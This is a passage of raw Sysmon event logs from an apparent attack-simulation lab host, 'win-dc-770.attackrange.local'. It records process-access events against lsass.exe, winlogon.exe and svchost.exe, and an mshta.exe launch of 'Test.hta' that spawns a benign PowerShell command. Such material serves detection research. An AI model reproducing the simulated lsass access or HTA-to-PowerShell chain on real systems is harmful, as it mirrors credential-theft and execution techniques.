15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.330{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.330{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.330{732C744F-3235-6010-C7A2-00000000A301}70206060C:\Windows\system32\conhost.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.314{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000786564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.299{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.299{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.299{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000786561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.299{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.299{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.299{732C744F-3235-6010-C5A2-00000000A301}52205600C:\Windows\System32\mshta.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000786558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.312{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 52455ea6-5921-4614-baef-c4d94b254f13; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Test.hta" 10341000x8000000000000000786557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.268{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.268{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.268{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 